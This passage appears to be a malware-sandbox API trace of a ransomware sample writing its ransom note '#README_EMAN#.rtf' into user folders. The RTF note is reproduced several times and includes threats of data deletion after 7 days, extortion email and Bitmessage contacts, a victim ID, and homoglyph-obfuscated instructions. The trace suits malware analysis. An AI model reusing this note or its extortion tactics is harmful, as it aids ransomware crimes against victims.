Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.767] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n5¼\x0b5Ø${ \x1c\x01y\x7f\x96\x15\x8eàwôß0\"", lpUsedDefaultChar=0x0) returned 8717 [0297.768] WriteFile (in: hFile=0x294, lpBuffer=0x1ef4ad8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef4ad8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.768] CloseHandle (hObject=0x294) returned 1 [0297.769] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0297.769] GetLastError () returned 0x2 [0297.769] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0298.451] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 